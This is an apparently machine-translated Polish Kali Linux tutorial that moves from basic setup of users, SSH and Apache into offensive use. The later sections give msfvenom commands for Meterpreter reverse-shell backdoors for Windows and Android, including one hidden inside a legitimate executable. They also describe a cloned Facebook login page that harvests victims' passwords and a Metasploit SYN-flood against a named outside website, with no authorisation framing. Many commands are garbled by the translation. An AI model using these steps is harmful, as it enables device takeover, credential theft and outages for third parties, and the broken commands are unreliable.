Dlaczego powinieneś używać Kali Linux?
Kali Linux jest wykorzystywany głównie przez testerów penetracyjnych, audytorów bezpieczeństwa, badaczy kryminalistycznych i badaczy. Ma prawie każde wstępnie zainstalowane narzędzie lub skrypt, którego można użyć do dowolnego z powyższych celów. Możesz użyć Kali Linux do pękania sieci Wi -Fi, do uruchamiania Intelligence Open Source (Osint), do hakowania stron internetowych i sieci i wielu innych.
Oprócz hakowania etycznego, Kali Linux ma również zestaw narzędzi do badań kryminalistycznych. Kryminalistyki to kolejna ważna i rozwijająca się gałąź bezpieczeństwa, której głównym celem jest gromadzenie i analiza dowodów działalności przestępczej, a następnie cofnięcie cyberprzestępców. Badanie kryminalistyczne pomaga prześledzić i usuwać złośliwe efekty (backdoors, Malwares) wynikało z działalności przestępczej i obliczania/obsługi straty po cyberataku. Kali Linux ma osobny tryb Stealth Live dla operacji „kryminalistyki”, w których nie pozostawia odcisku palca na systemie hosta.
Wygodny w środowisku Kali
Kali nie jest stworzony dla zwykłych użytkowników i nie jest zbyt przyjazny dla użytkownika, jak Windows lub Ubuntu. Jego domyślnym środowiskiem jest root, który nie jest bardzo łatwy w użyciu i jest dość niebezpieczny dla noobs. Brakuje również niektórych podstawowych narzędzi, takich jak SNAP, VirtualBox i inne przydatne narzędzia, które są obecne w Ubuntu.
Pierwsza rzecz
Pierwszą rzeczą jest stworzenie użytkownika nie-root
root@kali: ~# adduser kali
Dodanie użytkownika „kali”…
Dodanie nowej grupy „Kali” (1002)…
Dodanie nowego użytkownika „Kali” (1002) do grupy „Kali”…
Tworzenie katalogu domowego „/home/kali”…
Kopiowanie plików z „/etc/skel”…
Nowe hasło:
… Snip…
root@kali: ~# Usermod -Ag sudo kali
Zainicjuj bazę danych PostgreSQL Metasploit Framework
root@kali: ~# msfdb init init
Tworzenie użytkownika bazy danych „MSF”
Wprowadź hasło do nowej roli:
Wprowadź go ponownie:
Tworzenie baz danych „MSF” i „MSF_TEST”
… Snip…
Dodaj następujące wiersze do swojego „/etc/apt/źródła.Lista ”plik
deb http: // http.Kali.Org/Kali Kali-Rolling Główny wkład nie wolny
# Aby uzyskać dostęp do pakietu źródłowego, pocukaj następujący wiersz
# deb-src http: // http.Kali.Org/Kali Kali-Rolling Główny wkład nie wolny
Zainstaluj inne przydatne narzędzia.
root@kali: ~# apt -get aktualizacja && apt Upgrade -y
root@kali: ~# apt-get Zainstaluj VirtualBox VirtualBox-DKMs gobuster tor Tor-Browser
OpenVpn HTOP Atom Deepin -Terminal Tilix -y
Zarządzanie domyślnymi usługami Kali
Kali ma wiele wstępnie zainstalowanych niestandardowych usług, takich jak PostgreSQL, MySQL, SSH, HTTP. Jeśli nie są właściwie skonfigurowane, usługi te rozpoczną się jako proces w tle, gdy Kali Linux się uruchamia, a te otwarte porty mogą stanowić zagrożenie dla bezpieczeństwa systemu.
W tej sekcji przyjrzymy się, jak działają te usługi i jak można je właściwie skonfigurować i jak z nich korzystać. Standardowym sposobem konfigurowania narzędzia lub usługi jest odczytanie jego pliku DOC Readme. Plik ReadMe zawiera standardową procedurę konfiguracji i używania narzędzia lub usługi. Pliki Readme są zwykle znajdujące się w folderze „/usr/share/doc/[tool_name]/readme”.
Secure Shell Service (SSH)
Secure Shell (SSH) był używany od dłuższego czasu jako standardowe narzędzie do zdalnego wykonywania poleceń, plików przesyłania i innych celów administracji zdalnej. Pakiet obejmuje SSH (klient) i SSHD (serwis) do zdalnego sterowania innymi maszynami.
Usługa SSH nie jest domyślnie uruchamiana, gdy Kali Bots Up, możesz zacząć od pisania,
root@kali: ~ $ service ssh start
root@kali: ~ $ netstat -antp | grep -i sshd
TCP 0 0 0.0.0.0:22 0.0.0.0:* Posłuchaj 6601/sshd
TCP6 0 0 ::: 2 22 :::* Posłuchaj 6601/sshd
Jeśli chcesz SSHD, aby zacząć za każdym razem, gdy kali się uruchamia. Typ
root@kali: ~ $ aktualizacja-rc.D SSH Włącz
Jeśli chcesz, aby ktoś zalogował się do komputera za pośrednictwem SSH, użyje nazwy użytkownika i hasła Kali do uwierzytelnienia. Więc lepiej zmień domyślne hasło „toor” na coś bezpiecznego.
root@kali: ~ $ passwd
Zmiana hasła dla root.
Aktualne hasło:
Nowe hasło:
Wpisz ponownie nowe hasło:
PASSWD: Hasło pomyślnie zaktualizowane
Teraz ponownie załaduj usługę SSH, aby wpłynąć na zmiany
root@kali: ~ $ service SSH Reload
Usługa HTTP
Usługa HTTP jest bardzo korzystna podczas wykonywania zadań związanych z hakowaniem etycznym. Można go używać do hostowania fałszywych stron internetowych i strony internetowej, do przesyłania plików do zdalnych serwerów ofiar. Ponieważ aplikacje internetowe stają się coraz bardziej popularne, teraz ważniejsze jest, aby mieć wiedzę, aby zrozumieć i obsługiwać serwery HTTP, takie jak Apache.
Apache to serwer HTTP, który jest wstępnie zainstalowany w Kali. Usługa HTTP Apache jest domyślnie wyłączona, ale możesz ją uruchomić przy użyciu następującego polecenia.
root@kali: ~ $ service apache2 start
Apache będzie gospodarzem domyślnej strony internetowej Debian w lokalnej domenie w standardowym porcie HTTP 80. Przejdź do http: // localhost: 80/
Aby zacząć za każdym razem, gdy zaczyna się kali, wpisz
root@kali: ~ $ aktualizacja-rc.d Apache2 Włącz
Możesz także skonfigurować Apache na niestandardowym porcie, modyfikując jego plik konfiguracyjny (/etc/apache2/porty.conf)
root@kali: ~ $ nano/etc/apache2/porty.conf
Zapisz plik, a następnie uruchom
root@kali: ~ $ service apache2 restart
Teraz Apache będzie serwera na porcie „1234” zamiast standardowego portu 80.
Jeśli chcesz odczytać pełną dokumentację serwera Apache, przejdź do katalogu „/usr/share/doc/apache2/”, wpisz
root@kali: ~ $ cd/usr/share/doc/apache2/
root@kali:/usr/share/doc/apache2 $ gzip - -Decompress Readme.Debian.GZ
root@kali:/usr/share/doc/apache2 $ nano readme.Debian
Lista niektórych przydatnych poleceń
Znajdź służy do zlokalizowania pliku w Linux, przed użyciem tego polecenia musisz najpierw zaktualizować swoją bazę danych
root@kali: ~# aktualizowanebb
root@kali: ~# zlokalizuj uqjhssvf.JPEG
/root/uqjhssvf.JPEG
znajdować jest bardziej agresywny i nie polega na bazie danych. Rekurencyjnie wyszukuje plik w danym katalogu i jego sub -podkreślenia.
root@kali: ~# Znajdź ./ -name Main.py
./Desktop/Main.py
wget można użyć do pobrania strony internetowej lub pliku w terminalu.
root@kali: ~# wget tinytuba.com
--2019-05-11 08: 58: 48-- http: // tinytuba.com/
Rozwiązanie TinyTuba.com (TinyTuba.com)… 52.216.129.66
Łączenie z TinyTuba.com (TinyTuba.com) | 52.216.129.66 |: 80… połączone.
Wysłane żądanie HTTP, czekając na odpowiedź… 200 OK
Długość: 1551 (1.5k) [tekst/html]
Oszczędzanie na: „indeks.html '
indeks.HTML 100%[=========================>] 1 1.51K --.-Kb/s w 0s
2019-05-11 08:58:50 (56.5 MB/s) - „indeks.html 'uratowany [1551/1551]
root@kali: ~# indeks Firefox.html
szczyt Dostarcza informacji o swoim procesorze, zużyciu pamięci i innych statystykach.
historia Pokaż listę poprzednich poleceń, które wprowadziłeś w swoim terminalu.
Niektóre inne przydatne polecenia, które można znaleźć w Internecie LS, RM, RMDIR, Adduser, DeLuser, Service, Nano, Cat, więcej, mniej, niezamazja, whoami itp
Generowanie złośliwych backdoors
Możesz wygenerować złośliwe pliki binarne exe za pomocą „MSFVENOM” Kali Linux i zainstalować je w czyimś systemie, aby kontrolować go zdalnie.
root@kali: ~ $ msfvenom -a x86 --platform Windows -b '\ x00' -p Windows/MeterPreter/reverse_tcp
Lhost = [Adres IP atakującego] lport = [Port Atakera nr] -F exe> zabawa.exe
Znaleziono 11 kompatybilnych koderów
Próba kodowania ładunku za pomocą 1 iteracji x86/shikata_ga_nai
x86/shikata_ga_nai odniósł sukces z rozmiarem 368 (iteracja = 0)
x86/shikata_ga_nai wybrany z końcowym rozmiarem 368
Rozmiar ładunku: 368 bajtów
Ostateczny rozmiar pliku exe: 73802 bajtów
root@kali: ~ $ ls zabawa.exe
zabawa.exe
root@kali: ~ $ plik zabawa.exe
zabawa.EXE: PE32 Exceutable (GUI) Intel 80386, dla MS Windows
Aby wygenerować backdoor dla systemów Windows architektury x64, wpisz następujące polecenie.
root@kali: ~ $ msfvenom --platform Windows -b '\ x00' -p Windows/x64/MeterPreter/reverse_tcp
Lhost = [Adres IP atakującego] lport = [Port Atakera nr] -F exe> zabawa.exe
[-] Brak arch
Znaleziono 3 kompatybilne enkodery
… Snip…
root@kali: ~ $ plik zabawa.exe
zabawa.EXE: PE32+ wykonywalny (GUI) x86-64, dla MS Windows
Osadzanie backdorzy w legalne aplikacje za pomocą Kali
Możesz także osadzić swój złośliwy kod backdoor w nieszkodliwy plik exe, taki jak instalator Adobe Reader lub jakiś odtwarzacz multimedialny. Wynikowy wykonywalny wykonywalny będzie wyglądał jak uzasadniona aplikacja, ale po wykonaniu na komputerze ofiary uruchomi twoje złośliwe backdoor wraz z tą legalną aplikacją, co skutkuje naruszeniem komputera ofiary.
W Kali Linux jest już kilka systemów systemu Windows, którego użyjemy do demonstracji.
root@kali: ~ $ ls/usr/share/share/Windows-Binary/
Backdoors/ exe2bat.exe Fport/ Klogger.exe nbtenum/ plink.EXE VNCVIEWER.EXE WHOAMI.exe
enumplus/ fgdump/ hyperion/ mbenum/ nc.EXE RADMIN.exe wget.exe
Wstraszamy nasz ładunek do „vncviewer.exe ”wykonywalny.
root@kali: ~ $ msfvenom -a x86 --platform Windows -x/usr/share/Windows -Binaries/vncViewer.exe
-k -p Windows/MeterPreter/reverse_tcp lhost = [Ataker's IP] Lport = [Port atakujący]
-e x86/shikata_ga_nai -i 3 -b "\ x00" -f exe -o vncviewer.exe
Znaleziono 1 kompatybilne enkodery
Próba kodowania ładunku za pomocą 3 iteracji x86/shikata_ga_nai
… Snip…
Rozmiar ładowania: 422 bajtów
Ostateczny rozmiar pliku EXE: 421376 bajtów
Zapisano jako: vncviewer.exe
Generowanie backdoorów Androida
Aby zdalnie kontrolować telefony z Androidem, możesz generować złośliwe pliki APK za pomocą MSFVENOM.
root@kali: ~ $ msfvenom -p Android/MeterPreter/reverse_tcp lhost = [IP atakującego]
Lport = [port atakującego nie] r> cokolwiek.Apk
[-] Nie wybrano platformy, wybierając MSF :: module :: platform :: Android z ładunku
[-] Brak arch
Brak określonych enkodera ani badcharów, wysyłając surowe ładunek
Rozmiar ładunku: 10087 bajtów
Inżynieria społeczna za pomocą Setoolkit
Inżynieria społeczna to wykorzystanie oszustwa do oszczędzania kogoś do ujawnienia swoich poufnych lub osobowych danych, które mogą być niewłaściwie wykorzystywane do złośliwych celów.
Najczęściej stosowaną techniką inżynierii społecznej jest phishing, w którym próbujesz wysyłać wiadomości, e -maile lub telefony, aby uzyskać osobiste informacje. Podczas ataku phishingowego odbiorca e -maila jest przekonany, że otrzymał e -mail z prawdziwego źródła, takiego jak bank lub departament rządowy, a następnie oszukał, aby ujawnić swoje wrażliwe poświadczenia.
W tej demonstracji sklonujemy stronę logowania na Facebooku za pomocą Setoolkit i hostujemy tę stronę na naszym serwerze HTTP, a następnie wyślemy adres IP naszego serwera HTTP do ofiary. Gdy ofiara loguje się na naszej fałszywej stronie logowania na Facebooku, ta strona wyśle jego nazwę użytkownika i hasło do naszego komputera Kali.
Typ Setoolkit W terminalu setoolkit zostanie otwarty
Kiedy ofiara wpisuje nasz adres IP w swojej przeglądarce, otrzyma naszą fałszywą stronę logowania na Facebooku, którą stworzyliśmy wcześniej. Musimy poczekać, aż ofiara wejdzie do jego nazwy użytkownika i hasła na naszą sklonowaną stronę. Fałszywa strona na Facebooku będzie wyglądać tak,
Dopóki użytkownik wejdzie w swoje poświadczenia, Setoolkit wyświetli je na terminalu.
To demo było w sieci lokalnej, jeśli chcesz to zrobić na publicznym IP, musisz wykonać przekazywanie portów w router lub możesz użyć NGRok dla publicznego numeru IP i numeru portu.
Atak odmowy usługi (DOS) za pomocą Metasploit
Atak odmowy usługi (DOS) jest rodzajem ataku na system lub sieć, który zmniejsza lub ogranicza dostępność zasobów systemowych do legalnych użytkowników. Celem ataku DOS nie jest kradzież wrażliwych informacji, zamiast tego atakujący próbuje zalać system ofiary za pomocą próśb o usługi niezwiązane z prawem w celu przeciążenia zasobów.
Rozproszony atak odmowy usługi (DDOS) potrzebuje dużej liczby systemów (określanych jako zombie) atakującego pojedynczy cel, co powoduje odmowę usług. Pojedynczy atak DOS nie może wpływać na duże serwery i sieci przedsiębiorstwa, dlatego DDOS jest bardziej skuteczny i śmiertelny. Trudno jest również wyśledzić i zablokować atak DDOS, ponieważ setki i tysiące systemów zombie atakują jednego hosta.
Są to wiele narzędzi i skryptów dostępnych do ataków DOS i DDOS, ale użyjemy modułu pomocniczego Metasploit do demonstracji. Postaramy się zdjąć przykładową stronę internetową „WWW.Jarusa.com ”.
Najpierw przejdź do https: // www.isitdownrightnow.com/ i potwierdź, że witryna jest uruchomiona
Witryna jest na górze. Teraz otwórz Metasploit Framework Console w terminalu.
root@kali: ~ $ msfconsole
… Snip…
MSF5> Użyj pomocniczy/DOS/TCP/Synflood
Dowiadywać się www.Jarusa.comAdres IP i ustaw go jako Rhost, a następnie uruchom atak
Po pewnym czasie zobaczysz, że ta strona nie jest dostępna. Potwierdź to za pomocą https: // www.isitdownrightnow.com/
Kali Linux jest domem dla hakerów etycznych, a ten samouczek, mam nadzieję, oświeci cię do podstaw Kali Linux, co może zrobić i jak zacząć od jego użycia.